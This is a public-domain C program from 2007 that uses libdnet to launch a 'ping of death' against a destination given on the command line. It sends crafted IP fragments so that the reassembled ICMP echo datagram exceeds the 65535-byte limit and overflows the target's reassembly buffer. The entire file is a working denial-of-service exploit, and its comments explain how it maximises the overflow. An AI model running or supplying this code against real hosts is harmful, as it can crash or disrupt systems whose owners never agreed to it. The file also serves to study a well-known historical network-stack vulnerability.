/*
	Ping of death using libdnet.
	David Fifield, 2007.

	This ping of death is designed to maximally overflow the destination
	buffer. It does this by sending fragments until their combined length is
	within 8 of the maximum datagram length (65535), then sending a final
	fragment whose length is as large as possible (the MTU). The size of the
	reconstructed datagram is 65508 + MTU.

	It must be run as root.

	Some relevant links:
	http://insecure.org/sploits/ping-o-death.html
	http://libdnet.sourceforge.net/

	This program is in the public domain.
*/

#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <dnet.h>

/* What identification number to use for the IP fragments. */
#define IDENTIFICATION 1000

/* The TTL to use within each fragment. */
#define TTL 64

static int ping_of_death(ip_t *handle, ip_addr_t dst_addr, unsigned int mtu);

static unsigned int get_mtu(struct addr *addr);

int main(int argc, char *argv[])
{
	ip_t *handle;
	struct addr dst_addr;
	unsigned int mtu;

	if (argc != 2) {
		fprintf(stderr, "Usage: %s <destination>\n", argv[0]);
		return 1;
	}

	if (addr_pton(argv[1], &dst_addr) == -1) {
		fprintf(stderr, "addr_pton error: %s.\n", argv[1]);
		return 1;
	}

	mtu = get_mtu(&dst_addr);
	if (mtu == -1)
		return 1;

	handle = ip_open();
	if (handle == NULL) {
		fprintf(stderr, "ip_open error (are you root?).\n");
		return 1;
	}

	if (ping_of_death(handle, dst_addr.addr_ip, mtu) == -1)
		return 1;

	ip_close(handle);

	return 0;
}

/* A number between 1 and 8 bytes smaller than IP_LEN_MAX. (This is always
   equal to 65528 because IP_LEN_MAX is 65535.) This is the length we're
   shooting for before sending the final datagram. */
#define IP_LEN_ALMOST_MAX ((IP_LEN_MAX - 1) / 8 * 8)

/* Send a ping of death to dst_addr over the specified IP sending handle. mtu is
   the MTU of the interface over which the ping will be sent. Return 0 on
   success or -1 on failure. */
static int ping_of_death(ip_t *handle, ip_addr_t dst_addr, unsigned int mtu)
{
	struct ip_hdr *ip;
	struct icmp_hdr *icmp;
	ip_addr_t src_addr;
	char *buf;
	unsigned int max_frag_payload_length;
	unsigned long count;

	/* Allocate a buffer to hold the datagram. */
	buf = malloc(mtu);
	if (buf == NULL) {
		fprintf(stderr, "Couldn't allocate datagram buffer.\n");
		return -1;
	}
	ip = (struct ip_hdr *) buf;
	icmp = (struct icmp_hdr *) (buf + IP_HDR_LEN);

	/* Let the kernel fill in the source address. */
	src_addr = IP_ADDR_ANY;

	/* Find the biggest multiple-of-8 payload that will fit in the MTU. All
	   fragments, except possibly the last two, will have a payload of this
	   length. */
	max_frag_payload_length = (mtu - IP_HDR_LEN) / 8 * 8;

	/* Start by sending a fragment with the ICMP echo request. Continue
	   sending fragments until we get within a max_frag_payload_length of
	   IP_LEN_ALMOST_MAX. Send the second-to-last fragment, which brings the
	   length to exactly IP_LEN_ALMOST_MAX. Then send a final fragment which
	   is as large as possible (not necessarily a multiple of 8). */
	count = 0;
	while (count < IP_LEN_MAX) {
		unsigned int payload_length;
		unsigned int datagram_length;
		unsigned int offset_flags;
		unsigned int checksum;

		memset(buf, 0, mtu);

		/* Decide how big of a fragment to send. */
		if (count < IP_LEN_ALMOST_MAX - max_frag_payload_length) {
			/* The lengths of the initial fragments are a large
			   multiple of 8. */
			payload_length = max_frag_payload_length;
		} else if (count < IP_LEN_ALMOST_MAX) {
			/* The second-to-last fragment brings us to within 8 of
			   the maximum length. */
			payload_length = IP_LEN_ALMOST_MAX - count;
		} else {
			/* The final fragment is as large as possible. */
			payload_length = mtu - IP_HDR_LEN;
		}
		datagram_length = payload_length + IP_HDR_LEN;

		/* Calculate the fragmentation offset (in 8-byte blocks). */
		offset_flags = count >> 3;
		/* Set the MF flag on all but the last fragment. */
		if (count < IP_LEN_ALMOST_MAX)
			offset_flags |= IP_MF;

		/* Build the IP header. It appears that if you use an
		   identification of 0 the kernel fills in a random
		   identification for you. */
		ip_pack_hdr(ip, IP_TOS_DEFAULT, datagram_length, IDENTIFICATION,
			offset_flags, TTL, IP_PROTO_ICMP, src_addr, dst_addr);

		/* Put the ICMP echo in the first fragment. */
		if (count == 0) {
			icmp_pack_hdr_echo(icmp, ICMP_ECHO, ICMP_CODE_NONE,
				0, 0, NULL, 0);
			/* Calculate the ICMP checksum of the entire ICMP
			   message. */
			checksum = ip_cksum_add(icmp, payload_length, 0);
			icmp->icmp_cksum = ip_cksum_carry(checksum);
		}

		/* Calculate the IP checksum. */
		ip_checksum(ip, datagram_length);

		/* Send the datagram. */
		if (ip_send(handle, buf, datagram_length) == -1) {
			fprintf(stderr, "ip_send error.\n");
			free(buf);
			return -1;
		}

		count += payload_length;
	}

	free(buf);

	return 0;
}

/* Return the MTU of the interface which would be used to send to addr. */
static unsigned int get_mtu(struct addr *addr)
{
	intf_t *i;
	struct intf_entry intf;

	i = intf_open();
	if (i == NULL) {
		fprintf(stderr, "intf_open error.\n");
		return -1;
	}

	intf.intf_len = sizeof(struct intf_entry);

	if (intf_get_dst(i, &intf, addr) == -1) {
		fprintf(stderr, "intf_get_dst error.\n");
		return -1;
	}

	intf_close(i);

	return intf.intf_mtu;
}
